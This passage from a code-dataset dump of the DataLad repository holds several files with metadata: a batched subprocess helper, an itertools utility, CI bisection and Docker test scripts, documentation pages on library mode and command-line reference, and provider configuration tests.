time, the attribute \"wait_timed_out\" will\n be set to \"True\".\n\n Parameters\n ----------\n return_stderr: bool\n if set to \"True\", the call will return all collected stderr content\n as string. In addition, if return_stderr is True and the log level\n is 5 or lower, and the configuration setting \"datalad.log.outputs\"\n evaluates to \"True\", the content of stderr will be logged.\n\n Returns\n -------\n str, optional\n stderr output if return_stderr is True, None otherwise\n \"\"\"\n\n if self.runner:\n\n abandon = self._get_abandon()\n\n # Close stdin to let the process know that we want to end\n # communication. We also close stdout and stderr to inform\n # the generator that we do not care about them anymore. This\n # will trigger process wait timeouts.\n self.generator.runner.close_stdin()\n\n # Process all remaining messages until the subprocess exits.\n remaining = []\n timeout = False\n try:\n for source, data in self.generator:\n if source == STDERR_FILENO:\n self.stderr_output += data\n elif source == STDOUT_FILENO:\n remaining.append(data)\n elif source == \"timeout\":\n if data is None and abandon is True:\n timeout = True\n break\n else:\n raise ValueError(f\"{self}: unknown source: {source}\")\n self.return_code = self.generator.return_code\n\n except CommandError as command_error:\n lgr.error(\n \"%s subprocess exited with %s (%s)\",\n self,\n repr(command_error.code),\n command_error\n )\n self.return_code = command_error.code\n\n if remaining:\n lgr.debug(\"%s: remaining content: %s\", self, remaining)\n\n self.wait_timed_out = timeout is True\n if self.wait_timed_out:\n lgr.debug(\n \"%s: timeout while waiting for subprocess to exit\", self)\n lgr.warning(\n \"Batched process (%s) \"\n \"did not finish, abandoning it without killing it\",\n self.generator.runner.process.pid,\n )\n\n result = self.get_requested_error_output(return_stderr)\n self.runner = None\n self.stderr_output = b\"\"\n return result\n\n def get_requested_error_output(self, return_stderr: bool):\n if not self.runner:\n return None\n\n stderr_content = ensure_unicode(self.stderr_output)\n if lgr.isEnabledFor(5):\n from . import cfg\n if cfg.getbool(\"datalad.log\", \"outputs\", default=False):\n stderr_lines = stderr_content.splitlines()\n lgr.log(\n 5,\n \"stderr of %s had %d lines:\",\n self.generator.runner.process.pid if self.generator.runner.process else 'terminated',\n len(stderr_lines))\n for line in stderr_lines:\n lgr.log(5, \"| \" + line)\n if return_stderr:\n return stderr_content\n return None\n\n def get_timeout_exception(self,\n fd: Optional[int]\n ) -> Optional[TimeoutExpired]:\n \"\"\"\n Get a process timeout exception if timeout exceptions should\n be generated for a process that continues longer than timeout\n seconds after self.close() was initiated.\n \"\"\"\n if self.timeout is None \\\n or fd is not None \\\n or self.exception_on_timeout is False\\\n or self._get_abandon() == \"wait\":\n return None\n return TimeoutExpired(\n cmd=self.command,\n timeout=self.timeout or 11.0,\n stderr=self.stderr_output)\n\n def _get_abandon(self):\n if self._abandon_cache is None:\n if _cfg_val not in (\"wait\", \"abandon\"):\n raise ValueError(f\"Unexpected value: {_cfg_var}={_cfg_val!r}\")\n self._abandon_cache = _cfg_val == \"abandon\"\n return self._abandon_cache\n\n\ndef _now():\n return datetime.now().astimezone()\n" }, { "alpha_fraction": 0.5169230699539185, "alphanum_fraction": 0.5246154069900513, "avg_line_length": 33.21052551269531, "blob_id": "09dfcbac33d969f4781005f198a8fd05ed6c132e", "content_id": "56602d1db112618749ec2dee59bfa2668d95a279", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 650, "license_type": "permissive", "max_line_length": 87, "num_lines": 19, "path": "/datalad/support/itertools.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Auxiliary itertools\"\"\"\n\nimport itertools\n\n\ndef groupby_sorted(iter, key=None):\n \"\"\"A little helper which first sorts iterable by the same key\n\n Since groupby expects sorted entries\n \"\"\"\n yield from itertools.groupby(sorted(iter, key=key), key=key)\n" }, { "alpha_fraction": 0.6231736540794373, "alphanum_fraction": 0.6602106690406799, "avg_line_length": 34.03571319580078, "blob_id": "626da268f60c0df220cd593c9d304457604fb7ad", "content_id": "cc1e2fbb196bf2e35c8ca53881782b8ae12135d7", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 2943, "license_type": "permissive", "max_line_length": 221, "num_lines": 84, "path": "/tools/ci/bisect-python.sh", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n# Needed to be ran while in the cpython git source base\n# http://github.com/python/cpython\n# and it will create a directory with \"-builds\" suffix added,\n# and virtualenv under datalad's venvs/build-$ver created\n# unless another location is specified with VIRTUALENV_PATH\n# (remove it first if you want to reinit it).\n#\n# Bisection command and args could be provided, so overall e.g.\n# to find where fix was implemented:\n# (git)lena:~/proj/misc/cpython[tags/v3.8.0a1^0]git\n# $> git bisect start\n# $> git bisect new v3.8.0\n# $> git bisect old v3.8.0a1\n# Bisecting: 1017 revisions left to test after this (roughly 10 steps)\n# [3880f263d2994fb1eba25835dddccb0cf696fdf0] bpo-36933: Remove sys.set_coroutine_wrapper (marked for removal in 3.8) (GH-13577)\n# $> CP_COMMIT=cb083f7cdf604c1d9d264f387f9e8846bc953eb3 bisect run ~/proj/datalad/datalad-master/tools/ci/bisect-python.sh 'python3 ~/proj/datalad/datalad-master/datalad/support/tests/test_parallel.py && exit 1 || exit 0'\n# Actually above example was never tried, I did use helper manually,\n# but should work\nset -eu\nexport PS4='> '\n\n_cpython_src=$(pwd)\n_datalad_src=$(dirname \"$0\")\n_datalad_src=$(readlink -f \"${_datalad_src}/../..\")\n\necho \"Python source: $_cpython_src DataLad: $_datalad_src\"\nif [ ! -e \"${_cpython_src}/configure\" ] || [ ! -e \"${_datalad_src}/setup.py\" ]; then\n echo \"ERROR: no needed sources were found\" >&2\n exit 125\nfi\n_ver=$(git -C \"$_cpython_src\" describe)\nif [ ! -z \"${CP_COMMIT:-}\" ]; then\n _ver=\"${_ver}+${CP_COMMIT:0:6}\"\nfi\n_destdir=\"${_cpython_src}-builds/${_ver}\"\n_python=\"${_destdir}/usr/local/bin/python3\"\n\n_venv_d=\"${VIRTUALENV_PATH:-${_datalad_src}/venvs/build-${_ver}}\";\nredopip=\nif [ ! -e \"${_python}\" ]; then\n echo \"INFO: Building python\"\n redopip=1\n rm -rf \"${_venv_d}\" # old one would not be good anyways\n (\n cd \"${_cpython_src}\"\n chronic git clean -dfx\n if [ ! -z \"${CP_COMMIT:-}\" ]; then\n git cherry-pick \"${CP_COMMIT}\" || exit 125\n fi\n PATH=/usr/lib/ccache:$PATH chronic ./configure || exit 125\n PATH=/usr/lib/ccache:$PATH chronic make -j8 install DESTDIR=\"${_destdir}\" || exit 125\n )\nelse\n echo \"SKIP: $_python is already there, skipping building python\"\nfi\n\n# create virtualenv\nif [ ! -z \"$redopip\" ] || [ ! -e \"${_venv_d}\" ]; then\n echo \"INFO: Creating virtualenv\"\n chronic virtualenv --python=\"${_python}\" \"${_venv_d}\" || exit 125\n\n source \"${_venv_d}/bin/activate\"\n chronic pip3 install -e \"${_datalad_src}/.[devel]\" || exit 125\nelse\n source \"${_venv_d}/bin/activate\"\n echo \"SKIP: $_venv_d already there, skipping virtualenv + pip call\"\nfi\n\necho \"All ready:\nbuild: $_destdir\nvenv: ${_venv_d}\nsource: source \\\"${_venv_d}/bin/activate\\\"\npython: $(which python3)\nver: $(python3 --version)\ndatalad: $(git -C \"${_datalad_src}\" describe)\n\"\nif [ \"$#\" != 0 ]; then\n echo \"INFO: running bisection command $*\"\n bash -c \"$*\"\nelse\n echo \"INFO: no bisection command given\"\nfi\n" }, { "alpha_fraction": 0.6132075190544128, "alphanum_fraction": 0.6301403045654297, "avg_line_length": 34.033897399902344, "blob_id": "bc6de06af50c78e102f1c78f049d5bf8bb0b94e8", "content_id": "4054fae0a063dd535446fd787c667f6c08caf491", "detected_licenses": [ "BSD-3-Clause", "MIT", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 4134, "license_type": "permissive", "max_line_length": 96, "num_lines": 118, "path": "/tools/testing/start_website_in_docker", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/bin/bash\n#emacs: -*- mode: shell-script; c-basic-offset: 4; tab-width: 4; indent-tabs-mode: t -*- \n#ex: set sts=4 ts=4 sw=4 noet:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# Helper to generate a Docker instance mapping user uder docker into your USER/UID/GID\n# and allowing to run tox within that clean automatically generated according to\n# README.md's apt-get lines environment\n#\nset -e\nexport PS4=+\n#set -x\nset -u\n\nDL_DIST=${1:-jessie}\n\ntopdir=$(readlink -f `dirname $0`)\ncd `dirname $0`\ndockerfile=$topdir/start_website_in_docker-Dockerfile\n# echo \"D: $DL_APT\"\nsed -e \"s,DL_DIST,$DL_DIST,g\" \\\n -e \"s,DL_USER,$USER,g\" \\\n -e \"s,DL_UID,`id -u`,g\" \\\n -e \"s,DL_GID,`id -g`,g\" \\\n -e \"s,DL_GIT_USER_EMAIL,`git config --get user.email`,g\" \\\n -e \"s,DL_GIT_USER_NAME,`git config --get user.name`,g\" \\\n $dockerfile.in >| $dockerfile\n\n#DL_APT=$(grep '^\\(apt-get\\|pip\\)' ./../../README.md)\n\n{\n # grep '^apt-get ' $topdir/../../README.md | sed -e 's|python-{|python{,3}-{|g'; \\\n echo \"eatmydata apt-get install -q -y build-essential datalad python-pip python-virtualenv;\"\n echo \"eatmydata apt-get install -q -y libffi-dev libssl-dev python-dev;\"\n # Install dependencies and remove system wide datalad\n echo \"eatmydata dpkg --purge datalad python-datalad;\"\n} | while read aptline; do\n sed -i -e \"s|\\(\\(.*\\)DL_APT\\(.*\\)\\)|\\2$aptline\\3\\n\\1|g\" $dockerfile\n :\ndone\nsed -e '/DL_APT/d' -i $dockerfile\n\necho \"I: copy authorized keys so they become avail inside\"\ncp ~/.ssh/authorized_keys $topdir/conf/\n\ntag_=website_${USER}_${DL_DIST}\ntag=datalad:${tag_}\necho \"I: tag $tag\"\nif docker images | grep -q datalad.*${tag_}; then\n echo \"I: tag already exists -- skipping rebuilding\"\nelse\n docker build -t $tag -f $dockerfile . #&& rm Dockerfile\n #docker build --no-cache=True -t $tag -f $dockerfile . #&& rm Dockerfile\nfi\n\ntopgitdir=`readlink -f ${topdir}/../..`\necho \"I: top git dir $topgitdir\"\n\n#set -x\ndocker_id=`docker ps | awk \"/\\\\<$tag\\\\>/{print \\\\$1}\"`\necho \"D: looking for a docker with tag '$tag': $docker_id\"\nif [ -z \"$docker_id\" ]; then\n stopped_docker_id=`docker ps -a | awk \"/\\\\<$tag\\\\>/{print \\\\$1}\"`\n if [ -z \"$stopped_docker_id\" ]; then\n echo \"I: Starting new container with apache running\"\n docker_id=`docker run -d \\\n -v $topgitdir:/home/$USER/datalad \\\n -p 127.0.0.1:8081:80 \\\n -p 127.0.0.1:2221:22 \\\n $tag`\n echo \"Started container $docker_id\"\n\n # ATM pip freaks out with obnoxious message \n # of parse error at \"'__placeh'\". So we better upgrade pip while at it\n # see https://github.com/pypa/pip/issues/3659\n echo \"I: upgrading pip to avoid obnoxious problems\"\n docker exec $docker_id bash -c \"pip install -U pip --force-reinstall\"\n\n echo \"I: installing datalad inside (in development mode)\"\n # crap -- in sid image finishes with\n # Segmentation fault (core dumped)\n # yoh@8c3178bd7ea7:~/datalad$ echo $?\n # 139\n docker exec $docker_id bash -c \"cd datalad; pip install -e .\"\n else\n echo \"I: starting previous docker container $stopped_docker_id\"\n docker_id=`docker start $stopped_docker_id`\n echo \"Started container $docker_id\"\n fi\nelse\n echo \"Using running container $docker_id\"\nfi\n\ndocker_git_version=`docker exec $docker_id git --version 2>&1 | cut -d ' ' -f 3`\nif dpkg --compare-versions $docker_git_version lt 2.4; then\n echo \"I: too old of a git, let's symlink the one from git-annex-standalone\"\n for f in git git-receive-pack git-upload-pack; do\n docker exec $docker_id ln -sf /usr/lib/git-annex.linux/$f /usr/local/bin/$f\n done\nfi\n\ncat <<EOF\n-------------------------\nYou now should be able to upload to this host under ssh://localhost:2221:/var/www/html,\nwhich should then be made available under http://localhost:8081 .\nIt is recommended to create ~/.ssh/config entry\n\nHost dataladlocalhost\n Port 2221\n Hostname localhost\n StrictHostKeyChecking no\n\nEOF\n" }, { "alpha_fraction": 0.7420600652694702, "alphanum_fraction": 0.745064377784729, "avg_line_length": 38.49152374267578, "blob_id": "3f98bcf23f158a855638ae737fdb503f6dfe0cc5", "content_id": "3b9d3d12a3e07ee25ffe82ed16fe17771cfd25de", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 2330, "license_type": "permissive", "max_line_length": 80, "num_lines": 59, "path": "/docs/source/design/application_vs_library_mode.rst", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": ".. -*- mode: rst -*-\n.. vi: set ft=rst sts=4 ts=4 sw=4 et tw=79:\n\n.. _chap_design_application_vs_libary_mode:\n\n***************************************\nApplication-type vs. library-type usage\n***************************************\n\n.. topic:: Specification scope and status\n\n This specification describes the current implementation.\n\nHistorically, DataLad was implemented with the assumption of application-type\nusage, i.e., a person using DataLad through any of its APIs. Consequently,\n(error) messaging was primarily targeting humans, and usage advice focused on\ninteractive use. With the increasing utilization of DataLad as an\ninfrastructural component it was necessary to address use cases of library-type\nor internal usage more explicitly.\n\nDataLad continues to behave like a stand-alone application by default.\n\nFor internal use, Python and command-line APIs provide dedicated mode switches.\n\nLibrary mode can be enabled by setting the boolean configuration setting\n``datalad.runtime.librarymode`` **before the start of the DataLad process**.\nFrom the command line, this can be done with the option\n``-c datalad.runtime.librarymode=yes``, or any other means for setting\nconfiguration. In an already running Python process, library mode can be\nenabled by calling ``datalad.enable_libarymode()``. This should be done\nimmediately after importing the ``datalad`` package for maximum impact.\n\n.. code-block:: python\n\n >>> import datalad\n >>> datalad.enable_libarymode()\n\nIn a Python session, library mode **cannot** be enabled reliably by just setting\nthe configuration flag **after** the ``datalad`` package was already imported.\nThe ``enable_librarymode()`` function must be used.\n\nMoreover, with ``datalad.in_librarymode()`` a query utility is provided that\ncan be used throughout the code base for adjusting behavior according to the\nusage scenario.\n\nSwitching back and forth between modes during the runtime of a process is not\nsupported.\n\nA library mode setting is exported into the environment of the Python process.\nBy default, it will be inherited by all child-processes, such as dataset\nprocedure executions.\n\n\nLibrary-mode implications\n=========================\n\nNo Python API docs\n Generation of comprehensive doc-strings for all API commands is skipped. This\n speeds up ``import datalad.api`` by about 30%.\n" }, { "alpha_fraction": 0.7376264929771423, "alphanum_fraction": 0.7402023673057556, "avg_line_length": 43.18699264526367, "blob_id": "d7ef4b1496447e89676cfa5e56dd6b416d7f84a1", "content_id": "a915c3b0e027ea40771b79d51c5a808a3c3d4b3f", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 5435, "license_type": "permissive", "max_line_length": 143, "num_lines": 123, "path": "/docs/source/cmdline.rst", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": ".. -*- mode: rst -*-\n.. vi: set ft=rst sts=4 ts=4 sw=4 et tw=79:\n\n.. _chap_cmdline:\n\n**********************\nCommand line reference\n**********************\n\nMain command\n============\n\n.. toctree::\n :maxdepth: 1\n\n datalad: Main command entrypoint <generated/man/datalad>\n\nCore commands\n=============\n\nA minimal set of commands that cover essential functionality. Core commands\nreceive special scrutiny with regard API composition and (breaking) changes.\n\nLocal operation\n---------------\n\n.. toctree::\n :maxdepth: 1\n\n datalad create: Create a new dataset <generated/man/datalad-create>\n datalad save: Save the state of a dataset <generated/man/datalad-save>\n datalad run: Run a shell command and record its impact on a dataset <generated/man/datalad-run>\n datalad status: Report on the state of dataset content <generated/man/datalad-status>\n datalad diff: Report differences between two states of a dataset <generated/man/datalad-diff>\n\nDistributed operation\n---------------------\n\n.. toctree::\n :maxdepth: 1\n\n datalad clone: Obtain a dataset (sibling) from another location <generated/man/datalad-clone>\n datalad push: Push updates/data to a dataset sibling <generated/man/datalad-push>\n\n\nExtended set of functionality\n=============================\n\nDataset operations\n------------------\n\n.. toctree::\n :maxdepth: 1\n\n datalad add-readme: Add information on DataLad dataset to a README <generated/man/datalad-add-readme>\n datalad addurls: Update dataset content from a list of URLs <generated/man/datalad-addurls>\n datalad copy-file: Copy file identity and availability from one dataset to another <generated/man/datalad-copy-file>\n datalad drop: Drop datasets or dataset components <generated/man/datalad-drop>\n datalad get: Obtain any dataset content <generated/man/datalad-get>\n datalad install: Install a dataset from a (remote) source <generated/man/datalad-install>\n datalad no-annex: Configure a dataset to never put file content into an annex <generated/man/datalad-no-annex>\n datalad remove: Unlink components from a dataset <generated/man/datalad-remove>\n datalad subdatasets: Query and manipulate subdataset records of a dataset <generated/man/datalad-subdatasets>\n datalad unlock: Make dataset file content editable <generated/man/datalad-unlock>\n\n\nDataset siblings and 3rd-party platform support\n-----------------------------------------------\n\n.. toctree::\n :maxdepth: 1\n\n datalad siblings: Query and manipulate sibling configuration of a dataset <generated/man/datalad-siblings>\n datalad create-sibling: Create a sibling on an SSH-accessible machine <generated/man/datalad-create-sibling>\n datalad create-sibling-github: Create a sibling on GitHub <generated/man/datalad-create-sibling-github>\n datalad create-sibling-gitlab: Create a sibling on GitLab <generated/man/datalad-create-sibling-gitlab>\n datalad create-sibling-gogs: Create a sibling on GOGS <generated/man/datalad-create-sibling-gogs>\n datalad create-sibling-gitea: Create a sibling on Gitea <generated/man/datalad-create-sibling-gitea>\n datalad create-sibling-gin: Create a sibling on GIN (with content hosting) <generated/man/datalad-create-sibling-gin>\n datalad create-sibling-ria: Create a sibling in a RIA store <generated/man/datalad-create-sibling-ria>\n datalad export-archive: Export dataset content as a TAR/ZIP archive <generated/man/datalad-export-archive>\n datalad export-archive-ora: Export a local dataset annex for the ORA remote <generated/man/datalad-export-archive-ora>\n datalad export-to-figshare: Export dataset content as a ZIP archive to figshare <generated/man/datalad-export-to-figshare>\n datalad update: Obtain and incorporate updates from dataset siblings <generated/man/datalad-update>\n\n\nReproducible execution\n----------------------\n\nExtending the functionality of the core ``run`` command.\n\n.. toctree::\n :maxdepth: 1\n\n datalad rerun: Re-execute previous datalad-run commands <generated/man/datalad-rerun>\n datalad run-procedure: Run prepared procedures (DataLad scripts) on a dataset <generated/man/datalad-run-procedure>\n\n\nHelpers and support utilities\n-----------------------------\n\n.. toctree::\n :maxdepth: 1\n\n datalad add-archive-content: Extract and add the content of an archive to a dataset <generated/man/datalad-add-archive-content>\n datalad clean: Remove temporary left-overs of DataLad operations <generated/man/datalad-clean>\n datalad check-dates: Scan a dataset for dates and timestamps <generated/man/datalad-check-dates>\n datalad configuration: Get and set configuration <generated/man/datalad-configuration>\n datalad create-test-dataset: Test helper <generated/man/datalad-create-test-dataset>\n datalad download-url: Download helper with support for DataLad's credential system <generated/man/datalad-download-url>\n datalad foreach-dataset: Run a command or Python code on the dataset and/or each of its sub-datasets <generated/man/datalad-foreach-dataset>\n datalad sshrun: Remote command execution using DataLad's connection management <generated/man/datalad-sshrun>\n datalad shell-completion: Helper to support command completion <generated/man/datalad-shell-completion>\n datalad wtf: Report on a DataLad installation and its configuration <generated/man/datalad-wtf>\n\n\nDeprecated commands\n-------------------\n\n.. toctree::\n :maxdepth: 1\n\n datalad uninstall: Drop subdatasets <generated/man/datalad-uninstall>\n" }, { "alpha_fraction": 0.6277466416358948, "alphanum_fraction": 0.6302240490913391, "avg_line_length": 34.70769119262695, "blob_id": "f82ea9aba765eafbde5f21a76990ebad6a30a0d8", "content_id": "36f8a692fcad6898382f021182364ed64d303220", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9284, "license_type": "permissive", "max_line_length": 107, "num_lines": 260, "path": "/datalad/downloaders/tests/test_providers.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Tests for data providers\"\"\"\n\nimport logging\nimport os.path as op\nfrom unittest.mock import patch\n\nfrom ...support.external_versions import external_versions\nfrom ...tests.utils_pytest import (\n assert_equal,\n assert_false,\n assert_greater,\n assert_in,\n assert_raises,\n ok_exists,\n swallow_logs,\n with_tempfile,\n with_testsui,\n with_tree,\n)\nfrom ...utils import (\n chpwd,\n create_tree,\n)\nfrom ..providers import (\n HTTPDownloader,\n Provider,\n Providers,\n)\n\n\ndef test_Providers_OnStockConfiguration():\n providers = Providers.from_config_files()\n provider_names = {p.name for p in providers}\n assert_in('datalad-test-s3', provider_names)\n assert_in('crcns', provider_names)\n assert_greater(len(provider_names), 5)\n # too rigid\n #eq_(provider_names, {'crcns', 'crcns-nersc', 'hcp-http', 'hcp-s3', 'hcp-web', 'hcp-xnat', 'openfmri'})\n\n # every provider must have url_res\n for provider in providers:\n assert(provider.url_res)\n\n # and then that we didn't screw it up -- cycle few times to verify that we do not\n # somehow remove existing providers while dealing with that \"heaplike\" list\n for i in range(3):\n provider = providers.get_provider('https://crcns.org/data....')\n assert_equal(provider.name, 'crcns')\n\n provider = providers.get_provider('https://portal.nersc.gov/project/crcns/download/bogus')\n assert_equal(provider.name, 'crcns-nersc')\n\n assert_equal(providers.needs_authentication('http://google.com'), None)\n assert_equal(providers.needs_authentication('http://crcns.org/'), True)\n assert_equal(providers.needs_authentication('http://openfmri.org/'), False)\n\n providers_repr = repr(providers)\n # should list all the providers atm\n assert_equal(providers_repr.count('Provider('), len(providers))\n\n # Should be a lazy evaluator unless reload is specified\n assert(providers is Providers.from_config_files())\n assert(providers is not Providers.from_config_files(reload=True))\n\n\ndef test_Providers_default_ones():\n providers = Providers() # empty one\n\n # should return default one\n http_provider = providers.get_provider(\"http://example.com\")\n # which must be the same if asked for another one of http\n http_provider2 = providers.get_provider(\"http://datalad.org\")\n assert(http_provider is http_provider2)\n\n # but for another protocol, we would generate a new one\n crap_provider = providers.get_provider(\"crap://crap.crap\")\n assert(crap_provider is not http_provider)\n assert(isinstance(crap_provider, Provider))\n\n\ndef test_Providers_process_credential():\n # If unknown type -- raises ValueError\n assert_raises(ValueError, Providers._process_credential, 'cred', {'type': '_unknown_'})\n\n\ndef test_get_downloader_class():\n url = 'http://example.com'\n\n with patch.object(external_versions, '_versions', {'requests': 1}):\n assert Provider._get_downloader_class(url) is HTTPDownloader\n\n with patch.object(external_versions, '_versions', {'requests': None}):\n with assert_raises(RuntimeError) as cmr:\n Provider._get_downloader_class(url)\n assert_in(\"you need 'requests'\", str(cmr.value))\n\n\n@with_tree(tree={\n 'providers': {'atest.cfg':\"\"\"\\\n[provider:syscrcns]\nurl_re = https?://crcns\\\\.org/.*\nauthentication_type = none\n\"\"\"}})\n@with_tree(tree={\n 'providers': {'atestwithothername.cfg':\"\"\"\\\n[provider:usercrcns]\nurl_re = https?://crcns\\\\.org/.*\nauthentication_type = none\n\"\"\"}})\n@with_tree(tree={\n '.datalad': {'providers': {'atest.cfg':\"\"\"\\\n[provider:dscrcns]\nurl_re = https?://crcns\\\\.org/.*\nauthentication_type = none\n\"\"\"}},\n '.git': { \"HEAD\" : \"\"}})\[email protected](\"platformdirs.AppDirs\", site_config_dir=None, user_config_dir=None)\ndef test_Providers_from_config__files(sysdir=None, userdir=None, dsdir=None):\n \"\"\"Test configuration file precedence\n\n Ensure that provider precedence works in the correct order:\n\n datalad defaults < dataset defaults < system defaults < user defaults\n \"\"\"\n\n # Test the default, this is an arbitrary provider used from another\n # test\n providers = Providers.from_config_files(reload=True)\n provider = providers.get_provider('https://crcns.org/data....')\n assert_equal(provider.name, 'crcns')\n\n # Test that the dataset provider overrides the datalad\n # default\n with chpwd(dsdir):\n providers = Providers.from_config_files(reload=True)\n provider = providers.get_provider('https://crcns.org/data....')\n assert_equal(provider.name, 'dscrcns')\n\n # Test that the system defaults take precedence over the dataset\n # defaults (we're still within the dsdir)\n with patch.multiple(\"platformdirs.AppDirs\", site_config_dir=sysdir, user_config_dir=None):\n providers = Providers.from_config_files(reload=True)\n provider = providers.get_provider('https://crcns.org/data....')\n assert_equal(provider.name, 'syscrcns')\n\n # Test that the user defaults take precedence over the system\n # defaults\n with patch.multiple(\"platformdirs.AppDirs\", site_config_dir=sysdir, user_config_dir=userdir):\n providers = Providers.from_config_files(reload=True)\n provider = providers.get_provider('https://crcns.org/data....')\n assert_equal(provider.name, 'usercrcns')\n\n\n@with_tempfile(mkdir=True)\ndef test_providers_enter_new(path=None):\n with patch.multiple(\"platformdirs.AppDirs\", site_config_dir=None,\n user_config_dir=path):\n providers_dir = op.join(path, \"providers\")\n providers = Providers.from_config_files(reload=True)\n\n url = \"blah://thing\"\n url_re = r\"blah:\\/\\/.*\"\n auth_type = \"http_auth\"\n creds = \"user_password\"\n\n @with_testsui(responses=[\"foo\", url_re, auth_type,\n creds, \"no\"])\n def no_save():\n providers.enter_new(url)\n no_save()\n assert_false(op.exists(op.join(providers_dir, \"foo.cfg\")))\n\n @with_testsui(responses=[\"foo\", url_re, auth_type,\n creds, \"yes\"])\n def save():\n providers.enter_new(url)\n save()\n ok_exists(op.join(providers_dir, \"foo.cfg\"))\n\n create_tree(path=providers_dir, tree={\"exists.cfg\": \"\"})\n @with_testsui(responses=[\"exists\", \"foobert\", url_re,\n auth_type, creds, \"yes\"])\n def already_exists():\n providers.enter_new(url)\n already_exists()\n ok_exists(op.join(providers_dir, \"foobert.cfg\"))\n\n @with_testsui(responses=[\"crawdad\", \"yes\"])\n def known_provider():\n providers.enter_new(url)\n known_provider()\n\n @with_testsui(responses=[\"foo2\", url_re, auth_type,\n creds, \"yes\"])\n def auth_types():\n providers.enter_new(url, auth_types=[\"http_basic_auth\"])\n auth_types()\n ok_exists(op.join(providers_dir, \"foo2.cfg\"))\n\n @with_testsui(responses=[\"foo3\", \"doesn't match\", url_re, auth_type,\n creds, \"yes\"])\n def nonmatching_url():\n providers.enter_new(url, auth_types=[\"http_basic_auth\"])\n nonmatching_url()\n ok_exists(op.join(providers_dir, \"foo3.cfg\"))\n\n\n@with_tree(tree={'providers.cfg': \"\"\"\\\n[provider:foo0]\nurl_re = https?://foo\\\\.org/.*\nauthentication_type = none\n\n[provider:foo1]\nurl_re = https?://foo\\\\.org/.*\nauthentication_type = none\n\"\"\"})\ndef test_providers_multiple_matches(path=None):\n providers = Providers.from_config_files(\n files=[op.join(path, \"providers.cfg\")], reload=True)\n all_provs = providers.get_provider('https://foo.org/data',\n return_all=True)\n assert_equal({p.name for p in all_provs}, {'foo0', 'foo1'})\n\n # When selecting a single one, the later one is given priority.\n the_chosen_one = providers.get_provider('https://foo.org/data')\n assert_equal(the_chosen_one.name, \"foo1\")\n\n@with_tree(tree={'providers.cfg': \"\"\"\\\n[provider:foo0]\nurl_re = https?://[foo-a\\\\.org]/.*\nauthentication_type = none\n\n[provider:foo1]\nurl_re = https?://foo\\\\.org/.*\nauthentication_type = none\n\"\"\"})\ndef test_providers_badre(path=None):\n \"\"\"Test that a config with a bad regular expression doesn't crash\n\n Ensure that when a provider config has a bad url_re, there is no\n exception thrown and a valid warning is provided.\n \"\"\"\n\n providers = Providers.from_config_files(\n files=[op.join(path, \"providers.cfg\")], reload=True)\n\n # Regexes are evaluated when get_provider is called,\n # so we need to get a random provider, even though it\n # doesn't match.\n with swallow_logs(logging.WARNING) as msg:\n the_chosen_one = providers.get_provider('https://foo.org/data')\n assert_in(\"Invalid regex\", msg.out)\n" }, { "alpha_fraction": 0.5725793838500977, "alphanum_fraction": 0.5772269368171692, "avg_line_length": 33.70429992675781, "blob_id": "6a3bd2bab6ec4d7027b3eadd017255d98b6911a2", "content_id": "af653aecec902ea91a50b26f6fdf21701b4b7dd5", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6455, "license_type": "permissive", "max_line_length": 94, "num_lines": 186, "path": "/datalad/distribution/create_test_dataset.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"A Helper to initiate arbitrarily small/large test meta-dataset\n\n\"\"\"\n\n__docformat__ = 'numpy'\n\n\nimport random\nimport logging\nimport tempfile\n\nfrom datalad.utils import get_tempfile_kwargs\nimport os\nfrom os.path import join as opj, exists, isabs, abspath\nfrom datalad.distribution.dataset import Dataset\nfrom datalad.support.param import Parameter\nfrom datalad.support.constraints import EnsureStr, EnsureNone, EnsureInt\nfrom datalad.support.gitrepo import GitRepo\nfrom datalad.support.annexrepo import AnnexRepo\nfrom datalad.interface.base import Interface\nfrom datalad.interface.base import build_doc\n\nlgr = 